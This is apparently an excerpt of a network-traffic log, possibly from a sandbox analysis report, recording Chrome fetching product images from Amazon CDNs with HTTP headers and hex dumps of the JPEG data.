                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 7b 66 88 52 5c e3 2e 14 9d a4 ad 2f f0 d6 94 1d 57 56 74 40 c7 69 0c 61 99 5b 90 27 8c 5d 47 7b 14 02 dd 58 60 29 50 fb 41 75 43 e2 03 f8 81 4d fd a6 b4 3d 8c eb de e4 7f c4 ac 7f d1 ad 7f fc 28 ff 00 8b 48 fe ce 28 24 b6 7a d4 33 88 69 23 cc 63 00 5f 99 4a 9a 6e a5 71 a6 c9 de 40 d8 24 10 41 19 56 07 c8 83 c1 15 dd 3f 50 de 4c f0 36 54 08 0e 55 11 02 20 3e dc 53 78 76 33 af f9 45 1f f1 6b 8e ef b2 6d 6e d3 99 52 21 ca 8c f7 9e f1 0b 4a de cf 28 58 32 36 ba c1 07 1c a1 7b f3 b9 a0 bb 64 e0 8b 52 9e 2b af 4c 52 3b cd cc 73 b7 8c b6 73 c5 71 ca cd 2b bb b7 8b 31 27 ef 27 26 92 87 65 1a c9 75 88 24 45 99 58 f1 20 c6 17 02 9a 3a ff 00 4f 5c e8 17 26 d2 ed 54 38 55 38 53 b8 61 a9 d1 f6 57 47 50 74 d9 59 98 f3 7a 96 3c 72 07 3b d5 01 9a d6 ff 00 01 3f f6 9a 8c
                                                                                                                                                                                                                                                                      Data Ascii: {fR\./WVt@ia[']G{X`)PAuCM=(H($z3i#c_Jnq@$AV?PL6TU >Sxv3EkmnR!J(X26{dR+LR;ssq+1''&eu$EX :O\&T8U8SaWGPtYz<r;?
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 8e 32 80 82 bb 63 f5 38 60 dc ad 47 9d 51 d5 87 4e d7 ed 55 95 fb b8 17 0c 03 90 1b bd f3 db e0 76 d3 87 b4 7d 69 b4 db 01 12 2e 4d d6 53 ee 04 72 6a dc 27 5a 43 13 37 be 55 9a fc 4e 28 e3 96 43 b3 77 4e 6b 9b 38 ec 34 c9 ad e2 27 64 70 b8 19 39 3e 06 9a bd 98 ae 74 1b 1f be 6f ce f5 8e 98 d6 fe 95 d0 e7 05 76 98 22 74 ff 00 82 52 1f 67 da e4 76 da 3d 9c 22 29 24 75 32 e7 6a 71 cb b1 f1 25 56 ae 18 8c 74 b2 b5 db 87 01 fb 15 72 9e 76 cf 49 ab 1e c4 87 27 2f 50 74 ea f5 10 75 9d 16 27 8c a8 8d 9c 07 04 89 12 64 71 e1 e6 84 05 a4 ed 77 a7 b5 2d 32 5e a1 d5 34 82 1a 5b fb 55 c2 78 ba 4b 02 b2 a1 41 e7 bc 10 30 4a e0 8a 68 df 6a 6f af eb f7 89 71 08 5b 7d 22 c7 2e 93 3e c5 47 ba c9 32 12 03 80 c9 12 90 be ee 4d 2b 5e f5 e5 cc 73 c3 6b 1e c9 1a 6b df 46 51 1a
                                                                                                                                                                                                                                                                      Data Ascii: 2c8`GQNUv}i.MSrj'ZC7UN(CwNk84'dp9>tov"tRgv=")$u2jq%VtrvI'/Ptu'dqw-2^4[UxKA0Jhjoq[}".>G2M+^skkFQ
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1141INData Raw: 23 cf c6 95 93 4f 74 5f ed 52 1f c5 7f 95 0d 61 21 0c 3d 36 4f 0c 7f 70 60 fe 0b 58 2b 39 24 2d cc 80 a1 37 ac 7c 38 36 87 24 7c ab ca 19 ae 15 40 37 cf 90 31 96 b4 e4 fc 85 2f b6 9d 21 c0 17 92 67 23 dc f2 f1 fe ed 65 b4 c9 bc ee e4 f9 27 e9 a1 09 3e fa 39 23 b0 b9 12 be f6 ee e4 fb 5b 42 f9 1f 21 51 57 4b 68 a9 ab e8 3a 74 6f 23 20 46 b8 3b 97 d6 cb 77 b1 7f e8 35 4b ba c7 f6 3b af f4 a4 fc a6 a2 be 82 d4 1e 3d 1e ce 34 b7 77 c7 7b f6 f2 a9 1f ae e7 c4 b6 6a d0 f7 29 3f b9 bf ed 4c d6 93 0b fc 42 44 d6 35 4b ab 5d 72 ef 4d 82 e6 45 17 9a 78 86 13 bb 98 da d8 a3 4a e3 cb 7e c9 8b 64 7b 94 b9 a0 f6 83 64 fd 3b 60 fa c3 ef 77 d2 84 f3 02 9b c3 a0 c4 2e 4f c5 da 94 1f 44 92 e6 64 9d e2 84 4e 9e 97 b2 43 21 66 45 b9 e1 c6 d0 17 38 50 07 fb 69 ac 9d 96 44 ba
                                                                                                                                                                                                                                                                      Data Ascii: #Ot_Ra!=6Op`X+9$-7|86$|@71/!g#e'>9#[B!QWKh:to# F;w5K;=4w{j)?LBD5K]rMExJ~d{d;`w.ODdNC!fE8PiD


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      145192.168.2.549874151.101.193.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC456OUTGET /images/G/39/UAE-hq/2024/img/Books/XCM_CUTTLE_1733870_3871141_186x116_1X_en_AE._SY116_CB569183660_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 5855
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 7f12e918-92a6-4fa4-8491-33e81a5a1f1e
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Tue, 23 Jul 2024 07:16:18 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      Expires: Sun, 24 Jul 2044 09:42:52 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Age: 1822093
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000069-IAD, cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 02 02 02 04 03 04 04 04 04 06 09 07 07 06 07 07 0c 09 07 09 08 0b 07 08 08 0b 08 0b 0b 08 0a 0b 0a 0a 0d 0b 09 09 0b 0d 0a 0b 0c 11 0c 0e 0c 0f 0d 0c 10 0c 11 0c 11 10 10 11 13 13 11 0b 13 1a 01 04 04 02 04 04 04 06 04 04 09 10 0b 07 0d 10 0e 06 0c 14 10 13 0d 10 11 10 10 0c 16 10 13 10 10 0a 11 10 0d 0f 0f 0d 0d 0e 0c 0e 10 0d 11 11 11 07 0c 11 10 0b 17 0c 0d 0b 10 10 13 0f 0b 11 15 ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 be 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 00 06 07 08 09 02 03 05 04 01 10 00 02 01 03 02 03 04 05 06 09 09 07 05 00 00 00 02 03 04 00 05 12 06 13 01 07 22 14 32 42 52 08 11 23 33 62 15 17 53 72 92 d3 16 21 24 31 43 74 82 b2
                                                                                                                                                                                                                                                                      Data Ascii: JFIFt""2BR#3bSr!$1Ct
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 31 7c 7f 17 1a 8d 38 51 85 7c fb 23 a0 83 0f 4e 72 73 75 05 25 4a 51 bb c9 f3 06 2f f1 f1 2d 8d 43 ad 5c 9b 6c 50 98 7a 87 99 97 9b ba e3 25 98 29 4a 76 e0 a9 0a 14 01 33 cc 5c 38 77 8a 92 9a 92 f7 32 f9 36 45 c2 67 e3 63 b8 8f 13 e2 23 88 f4 88 8d 46 7c 28 c2 b0 f7 41 43 91 b1 ea 92 95 ec 7c c2 16 31 4c 48 c6 83 62 3a 52 7b c9 fc 5e a1 28 74 a6 a6 9f a7 66 71 9d 00 bd 4d c0 c7 22 1c c7 13 1f 57 1a f6 68 fd 6d 73 d3 7d a4 21 90 92 5e 22 2d 43 56 2d 51 e3 dd c8 0a a2 96 15 a8 c2 86 ba 08 13 16 ea ea 4a 4f b1 f3 0d 9d c5 b1 9f d6 6b e3 a5 57 5a 95 7b 3c 3b 3e a8 95 ba b7 58 5c b5 13 92 c9 bc 47 15 06 2a 50 00 82 94 3e 50 01 ad b6 8d 75 7b b6 8c a5 a2 4b 31 7a 4d 44 3c 48 8f 1e 05 f4 7e 52 f2 90 d4 48 21 a4 85 fa d6 22 5b e2 3f 5a b7 47 41 12 53 ea 7b fa a2
                                                                                                                                                                                                                                                                      Data Ascii: 1|8Q|#Nrsu%JQ/-C\lPz%)Jv3\8w26Egc#F|(AC|1LHb:R{^(tfqM"Whms}!^"-CV-QJOkWZ{<;>X\G*P>Pu{K1zMD<H~RH!"[?ZGAS{
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ad 4a 32 0d 14 ba db 93 52 fa 95 d8 b3 64 bd 41 2f cd 7b e2 60 ad 1a 56 d8 79 22 11 65 25 c3 dd 93 2b ba c2 f8 96 9e e0 53 23 5f 78 f0 af 95 7c c4 2e ae 8b 78 ab 99 41 8d a6 35 69 c8 14 51 45 4e 26 12 22 8a d9 45 48 17 41 45 14 50 00 d4 73 48 48 86 da 22 42 39 38 ba 8b ba 39 78 8b 1c 8a bb d0 f5 0e 9d 74 1b 36 96 97 30 8a 1c 15 ca 71 3b db 25 32 a6 c8 21 11 58 96 cc 87 2d 29 4f 48 b3 67 a8 bc 23 95 26 79 bf ee 2d ff 00 13 0a 99 78 59 48 21 58 89 11 11 08 88 8d 72 ec 4c d7 f7 47 73 f0 1c e3 11 b5 75 51 77 78 09 d5 2a e9 68 87 a6 e4 c6 d3 b3 18 56 d4 c3 62 fb 72 58 b5 dd 20 b8 a6 f6 e6 64 96 14 06 31 32 31 15 89 2f 12 2d ba 70 ae 5c ec be c5 bc d8 1f 2e c6 ce d1 32 e0 c1 8e 3b 8b 26 3a 29 12 d8 29 c8 48 b6 e4 0c a2 ed 04 25 8e 25 8d 34 56 df 43 9b ff 00 e0
                                                                                                                                                                                                                                                                      Data Ascii: J2RdA/{`Vy"e%+S#_x|.xA5iQEN&"EHAEPsHH"B989xt60q;%2!X-)OHg#&y-xYH!XrLGsuQwx*hVbrX d121/-p\.2;&:))H%%4VC
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 47 3b 9f 61 7a 15 76 4b 1c b2 f9 25 82 92 11 5c 8f c8 c4 97 da 1c cf 78 32 88 96 b6 0f bc 1c 47 6c 8b a8 a9 9e e4 c4 72 5f cb 24 45 91 14 75 e4 5f b5 4a cd 6b 68 b6 c8 b4 94 bd 91 19 c2 4c dc 59 5c 0a 66 ca c5 9f a3 22 61 6e 6d f7 71 f8 b2 ea a4 ff 00 28 bf ae 7f 57 5f ef 56 b2 23 a5 30 24 28 bd 05 7c 0c 79 65 ca 4a a0 4b b7 d0 51 7e 46 2e 43 53 40 ed 17 7d 3b ba 9d e4 b9 33 92 ce 9c 84 45 8b 5b 3d a7 94 72 5d 7b 66 e9 76 b2 e8 d9 d1 88 76 67 45 62 e5 2f cd e1 4b 07 e2 1c 88 4a bd 5a a2 64 95 db df f2 69 09 48 5a c4 85 7f 48 23 de a6 6a dd af fb 52 20 db 46 46 4e 65 c9 7d 5e 22 8e e2 dc fa be 2d ba 4e 5c a6 58 74 92 af be 91 65 0d c9 cf c0 67 53 ca 94 9b 07 e4 66 67 99 fb cb 2f 22 30 ea de 6c d1 97 60 2d 3f 26 56 3b d6 f6 27 78 87 bd ec 76 48 b1 a4 1e 8f
                                                                                                                                                                                                                                                                      Data Ascii: G;azvK%\x2Glr_$Eu_JkhLY\f"anmq(W_V#0$(|yeJKQ~F.CS@};3E[=r]{fvvgEb/KJZdiHZH#jR FFNe}^"-N\XtegSfg/"0l`-?&V;'xvH
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC343INData Raw: 00 35 d1 5b 28 ac 58 43 06 da 4f 89 0c 71 a3 1a ca 8a 35 69 ee 18 d5 27 b8 63 8d 18 d6 ea f8 54 6a d3 dc 0d 5a 7b 86 15 ae b6 51 85 16 90 cd a4 0a 2b 65 77 34 ee 9f 91 79 99 1e 0c 51 f5 b1 a5 fb 23 e2 22 22 f2 88 f5 15 44 e4 94 32 85 3a ef 2f 30 c8 ef 68 fb 5c 44 2a 5d ee ea 3f 91 40 f5 64 3e 29 2c 2f 72 81 f8 8f c5 e5 1a 8f da ab 52 ca d4 57 19 57 39 85 93 5e 59 17 94 7c 22 23 e5 15 8f 48 d3 89 cd 9d 68 89 ec 8f 66 b5 96 56 eb 7e 42 b2 ee f6 97 17 bd 79 7f e7 ba bf 28 d3 3d 55 d1 9b 53 aa 54 c7 79 95 ba 9f b2 9f dc f8 9f a8 bb 05 ac 38 36 a7 5a b1 ae bc d2 a2 8c 81 c6 bd b5 ae bd e3 da 10 84 24 b2 21 2a f9 4a 4b b4 3d c1 dc 1e f0 d2 64 6b 74 28 00 1a ca 8a 2a 50 02 8a 28 a0 02 50 50 14 51 40 5d 05 14 51 40 00 74 05 14 50 01 b2 8a 28 ad 40 0a c8 68 a2 80
                                                                                                                                                                                                                                                                      Data Ascii: 5[(XCOq5i'cTjZ{Q+ew4yQ#""D2:/0h\D*]?@d>),/rRWW9^Y|"#HhfV~By(=USTy86Z$!*JK=dkt(*P(PPQ@]Q@tP(@h


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      146192.168.2.54987018.239.85.2234432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC378OUTGET /images/I/31zyL4SK5OL._SR240,220_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC841INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      Content-Length: 4956
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Server: Server
                                                                                                                                                                                                                                                                      X-Amz-Ir-Id: c532ee1d-15e6-4c13-a67b-4fe07178266e
                                                                                                                                                                                                                                                                      Date: Fri, 16 Aug 2024 05:38:33 GMT
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 20 Jul 2023 01:48:56 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.in, https://www.amazon.com
                                                                                                                                                                                                                                                                      Edge-Cache-Tag: x-cache-037,/images/I/31zyL4SK5OL
                                                                                                                                                                                                                                                                      Expires: Thu, 11 Aug 2044 05:38:33 GMT
                                                                                                                                                                                                                                                                      Surrogate-Key: x-cache-037 /images/I/31zyL4SK5OL
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Via: 1.1 1dd177f0f1668dc5abba6f90eb9da04c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                      Age: 456696
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="cf"
                                                                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS58-P5
                                                                                                                                                                                                                                                                      X-Amz-Cf-Id: 87h8VVc7wNfM5AjBgwtzDyi1XEaXC7g9vq0w54jr8wLeSJnfVtGX2Q==
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC4956INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 dc 00 f0 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 00 07 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 02 01 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"5


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      147192.168.2.549879151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC610OUTGET /images/I/61cw3ImGcLL._AC_SY200_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 9628
                                                                                                                                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: 80d87652-4774-47b0-b934-0c89bbef737b
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Sun, 30 Jul 2023 09:52:24 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Thu, 05 Nov 2043 13:06:49 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:48 GMT
                                                                                                                                                                                                                                                                      Age: 1253259
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000150-IAD, cache-nyc-kteb1890088-NYC
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 00 c8 01 07 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 06 07 05 08 02 03 04 01 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 03 04 02 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 dc b0 00 00 00 31 99 3f 09 8b eb 8c d7
                                                                                                                                                                                                                                                                      Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*"51?
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 8d fc bc 4a 7f 89 26 18 fe 44 f5 2c cb 4a bb 47 f1 05 2b 07 88 a9 ff 00 6d f1 1d 55 f7 98 1a a8 cd df 8f ec 6f 69 a9 a0 7a 8c d2 c0 14 99 63 28 6b 04 b6 a2 6c 56 47 bc d8 f2 c0 45 61 22 56 c4 56 05 68 d5 5b c4 e8 8b c3 16 bd e7 89 db b5 62 69 ab ca fa c7 a7 ac 65 74 d4 56 1b 51 18 f4 91 5f b4 51 bc 64 e3 3c 37 b1 67 61 fb 6d 22 c0 39 50 83 62 00 c6 af 99 66 cb 60 67 c1 72 6e 52 bc 4d f7 df 16 b0 bb 81 77 67 13 4e 3f f1 ea f2 f1 33 ef 6a ac d0 31 4d 96 73 f4 6f d2 5a d6 66 97 e8 56 11 3e 55 66 33 4b b0 72 38 ee fd 09 d3 d8 cf 87 6b 3e dd 2a bc 9c 4b 37 1f b5 97 b9 13 1c 6d 0d 64 d8 c2 74 85 7d e5 dd 8c c9 bf a6 56 61 e5 72 da 6c 09 3b d1 fd 69 0b 85 f7 c9 d2 5b 36 e6 b1 b1 71 97 19 78 8f 4b 28 1e fb 14 72 36 86 93 38 4c 7a 7b ef 2a 5d ff 00 76 42 fd 7b ca
                                                                                                                                                                                                                                                                      Data Ascii: J&D,JG+mUoizc(klVGEa"VVh[bietVQ_Qd<7gam"9Pbf`grnRMwgN?3j1MsoZfV>Uf3Kr8k>*K7mdt}Varl;i[6qxK(r68Lz{*]vB{
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: bb d0 32 ae 2b a7 27 aa 63 52 eb 27 92 7d 25 74 b9 c9 79 2b 00 41 f6 b6 b8 9d ac d6 6a 27 23 dc 27 c4 0e a7 fe bd fc 17 a1 14 1f 8d 7e ef ff c4 00 25 11 00 02 02 02 01 03 03 05 00 00 00 00 00 00 00 00 01 02 03 04 00 11 30 05 12 13 10 23 31 14 21 22 40 50 ff da 00 08 01 03 01 01 08 00 fe 41 38 95 a5 94 7b 76 3a 15 9a b1 a4 b2 43 4e 59 df b5 08 2a 4a b7 25 4f 17 d4 20 9a 92 24 36 ec 88 ad 45 0d c8 5a 22 95 e4 a5 30 0f 6d 62 2c 64 4e 4a 88 a5 ce fb 98 4d 32 e4 13 a9 21 72 f0 95 e7 72 67 00 04 1c 3b cd fa d7 3e e8 c6 99 44 ae c0 75 18 e2 8c 3a b5 d8 64 4d a5 c6 dc 83 84 e1 61 f3 9e 5c 07 d7 67 8c 9c 2a 49 03 3c 0f a3 a7 ae d1 68 37 21 cd 6f ed 95 3a 54 73 f7 09 5e 95 6a db 92 2b 76 4c b2 f2 9c 8c 13 22 80 6c c3 1b 49 e6 6e bb 54 c6 21 49 58 12 08 e5 5d f7 0d
                                                                                                                                                                                                                                                                      Data Ascii: 2+'cR'}%ty+Aj'#'~%0#1!"@PA8{v:CNY*J%O $6EZ"0mb,dNJM2!rrg;>Du:dMa\g*I<h7!o:Ts^j+vL"lInT!IX]
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 81 91 a1 10 b1 c1 f0 20 30 d1 e1 40 f1 ff da 00 08 01 01 00 01 3f 21 fd 7c 94 7d cf 73 36 87 50 98 c0 f0 65 f2 0f bc a3 72 7c 77 53 4e 7d e0 83 54 85 5a 03 3b f1 d0 4a 20 03 a0 3f 32 cc 20 09 26 8d 01 09 65 a3 ba f6 05 57 c7 16 49 a3 16 9b 80 60 01 fa 59 ff 00 98 a7 13 37 29 b5 1c dd f1 96 94 bf b6 84 c1 eb 03 73 e7 04 9a 7f 5c 52 c7 e4 85 9f 92 06 82 c1 c0 31 70 d2 c9 ee 90 05 a1 4d e4 43 39 73 fd f9 f8 1f f4 1b 3c 1e d3 46 01 c4 b3 d8 62 1b 89 b0 42 a0 47 1d cc d3 69 c8 f5 54 fa 8d 20 89 8f 46 62 63 7c 52 6d e5 60 6d 18 20 dc 7c b4 e2 46 8f 1f 75 80 cc 8e 02 b3 ee 8d 8a e8 b5 03 c7 a0 e1 16 32 07 30 07 fa 8f b0 ae e8 e9 58 c9 64 7f ca 1e 70 84 44 d4 2f fa 3f 78 29 7a f2 4a 61 5d 9f 7c c2 0f 90 2f c0 86 ba 7f 98 5e 8f 7f 47 88 0e ae e2 64 be 3d 54 49 90
                                                                                                                                                                                                                                                                      Data Ascii: 0@?!|}s6Per|wSN}TZ;J ?2 &eWI`Y7)s\R1pMC9s<FbBGiT Fbc|Rm`m |Fu20XdpD/?x)zJa]|/^Gd=TI
                                                                                                                                                                                                                                                                      2024-08-21 18:28:48 UTC1378INData Raw: 87 70 31 a6 56 c2 fb c0 65 80 0d ef 00 fa 08 48 01 44 12 0e 66 55 af b8 86 e1 78 19 f3 02 1e 77 00 10 15 a0 18 79 04 73 56 3f b2 d0 7e d8 30 04 60 eb fb 7c af 74 3a 72 8a 8f 23 ed 19 be 0a bc 10 db f1 60 6c 16 18 24 50 1c dd b8 8d 3a c5 92 48 e3 7d 48 6e 62 45 81 42 18 5a 66 96 a5 8c 15 21 2e a1 a5 d8 03 c1 66 af 88 c2 00 a7 fe ab 3d 3d 07 50 46 c9 d8 31 3c e2 15 cd 03 47 f8 f7 c4 21 45 9e b1 25 a1 14 20 56 08 ea 02 ca 76 0e 61 d3 41 d2 25 6d 57 78 04 63 84 80 ba e6 1f e2 2f 68 7e 24 d1 92 3e e9 91 ce 61 10 00 1d 3f 68 2e 87 bc 2a 7d 33 0d 3e 46 20 34 5e fb 41 66 80 2c 35 38 88 64 30 3a c2 90 c3 0e c0 c9 1d 84 b0 87 d1 5f 76 9a 10 0b 29 e6 03 4f 8b 01 28 f9 0e 42 56 75 c0 38 06 c6 87 23 d0 39 8d e2 55 86 5d 38 84 51 0e 29 b5 6b ba f1 1c 94 8e 4c b8 54 06
                                                                                                                                                                                                                                                                      Data Ascii: p1VeHDfUxwysV?~0`|t:r#`l$P:H}HnbEBZf!.f==PF1<G!E% VvaA%mWxc/h~$>a?h.*}3>F 4^Af,58d0:_v)O(BVu8#9U]8Q)kLT
